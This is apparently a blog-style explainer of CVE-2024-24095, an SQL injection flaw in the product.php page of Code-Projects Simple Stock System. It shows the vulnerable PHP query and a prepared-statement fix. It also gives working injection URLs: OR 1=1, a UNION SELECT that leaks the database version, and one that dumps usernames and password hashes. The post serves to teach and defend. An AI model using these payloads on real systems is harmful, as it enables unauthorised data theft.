CVE-2024-24095 - Code-Projects Simple Stock System 1. – SQL Injection Vulnerability Explained

In early 2024, a critical SQL Injection vulnerability was discovered in Code-Projects Simple Stock System 1., tracked as CVE-2024-24095. This post walks you through the vulnerability, shows a simple exploit, and gives references—all in plain language.

What is Code-Projects Simple Stock System?

Simple Stock System 1. is a free inventory management app offered on code-projects.org. It is often used by students and small businesses to track stock items through a simple PHP web interface.

What’s the Issue? (CVE-2024-24095)

The issue is SQL Injection—a nasty vulnerability that lets attackers interact with the database in unintended ways by injecting malicious SQL code via user input fields.

Where is the Vulnerability?

The bug exists in the way user input is plugged into SQL queries without proper sanitization—especially in the product.php file.

A simplified snippet from the vulnerable code

<?php
// Vulnerable code from product.php
$id = $_GET['id'];
$query = "SELECT * FROM products WHERE id = $id";  // Dangerous!
$result = mysqli_query($conn, $query);
// ...
?>

Problem:
If you control the id parameter (like in product.php?id=1), you can inject SQL commands.

Suppose the attacker visits

http://localhost/SimpleStockSystem/product.php?id=1 OR 1=1

The SQL query becomes

SELECT * FROM products WHERE id = 1 OR 1=1

This returns all products, ignoring the intended filter. But it gets scarier—attackers can extract sensitive data or even modify the database.

Change the URL to

http://localhost/SimpleStockSystem/product.php?id=1 UNION SELECT 1,@@version,3,4,5

- If the products table has (say) 5 columns, this query will leak the MySQL version in the result.

If you know the structure, you can steal usernames and passwords (usually MD5-hashed)

http://localhost/SimpleStockSystem/product.php?id=1 UNION SELECT 1,username,password,4,5 FROM users--

How to Fix It

Never trust user input.
Use prepared statements!

Secure version

<?php
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param('i', $id);
$stmt->execute();
$result = $stmt->get_result();
// ...
?>

This ensures user input can’t change the structure of the SQL.

This bug was reported and tracked under CVE-2024-24095

- CVE-2024-24095 at NVD
- Original project download
- OWASP SQL Injection Guide

Conclusion

CVE-2024-24095 is a classic example of why input validation and prepared statements are essential. If you use Simple Stock System 1., update your code or move to a patched version immediately.

Timeline

Published on: 02/27/2024 02:15:06 UTC
Last modified on: 11/05/2024 18:35:04 UTC